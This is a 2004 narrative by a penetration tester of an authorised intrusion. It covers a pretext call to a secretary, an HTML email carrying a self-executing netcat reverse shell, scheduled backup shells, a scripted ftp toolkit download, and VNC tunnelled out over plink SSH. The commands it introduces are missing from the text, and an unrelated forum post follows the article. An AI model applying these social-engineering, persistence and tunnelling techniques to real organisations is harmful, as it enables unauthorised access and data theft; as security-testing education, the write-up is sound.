02.12.04
 By
Mati Aharoni
I was requested to perform a proof of concept hack into a large organization
a few weeks ago. The aim was to get an interactive session, preferably
GUI, on one of the internal machines which was guarded by 2 (External
and DMZ) firewalls, and an Intrusion detection system. I was allowed
to use any means necessary to achieve this goal. This is extremely
unusual for a penetrations test, where the rules, guidelines and penetration
methods are very strict and defined. I was supposed to impersonate
a hacker that would stop at nothing to gain interactive access to
the internal network.
Obviously, there was no external access to this machine from the internet,
so I had to plan the attack carefully.I decided to use some social
engineering skills to initiate a connection from the internal network
to my attacking machine, as this was the only way to establish communications
with my target. |
I
called up the organization, and asked to speak with the secretary
working on my target computer. I told her that “I was interested in
buying one of their products, and I would like to send her an email
with a few questions, before I make the purchase”. She gladly complied,
and disclosed her email address to me.
I crafted a special html email, with a reverse shell (netcat) payload,
which would self execute, once the email was opened. A few minutes
later, she received the email, opened it, thus shovelling a shell
to my listening machine. Let the games begin.
Once I had the shell, I had to create some "Backup Shells" in case
the connection gets severed. There's nothing worse than losing the
only single connection to a penetrated machine… I did this using the
"at" command, sending myself a NetCat shell every 15 minutes. I found
myself smiling every 15 minutes.
Once this was done, my first instinct was to start uploading my toolkit
to this machine using tftp, however it seemed that there were very
restrictive firewall policies on outgoing connections in the internal
network. TFTP just didn't go through.
By echoing ftp commands into a text file, I downloaded a small toolkit
to the victim machine, which included some VNC files, and a custom
made registry file, which places VNC setting (such as a VNC password
and a setting which allows to connect to VNC locally – more on that
later).
From this point onwards, I followed the instructions from http://guh.nu
to remotely install vnc, as can be summarized from these commands:
Now I had VNC installed on the remote machine, but there was no way
to get to port 5900 (VNC) in order to connect to it (2 firewalls,
and fascist outbound rules).
I decided to implement a UNIX scenario by which one can tunnel ports
via SSH to remote machines. The SSH client I found suitable for this
job was plink.exe (the putty command line client).
I installed the SSH server found in Cygwin on my attacking machine,
at proceeded to tunnel port 5900 from the victim machine, to my own:
The SSH connection had been made, and from a local netstat –a on my
machine, I could see that port 5900 was successfully mapped to my
attacking computer.
I quickly whipped out my VNC client, and attempted to connect locally
to port 5900:
To my surprise, I was welcomed with a password prompt:
And immediately after, I had a remote VNC session to the attacked
machine.
I had tunneled stuff via SSH many times in Linux environments, however
this was the first time I attempted to do in under Windows.
I was blown away by the Speed of the VNC session (due to the compression
on the SSH channel), and by the fact that it actually worked. I thought
of releasing a stray KaHt2.exe into the internal network (all in GUI,
of course), however, my objectives had been achieved, and it was very
late at night.
About the Author:
Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP
Visit the Security through Hacking Web site at http://www.secureit.co.il
for additional information.
|
| From the Forum: | | Help with changing hosts | My existing host will not transfer my website to another host, I am done downloading my entire site, through Adobe Acrobat, I could get all my files up there if I just knew how to set the right format I need (all files). I want it to to have the internet explorer icon as the rest of my files that I upload to my new server have.
Any help would be appreciated. |
    |
|
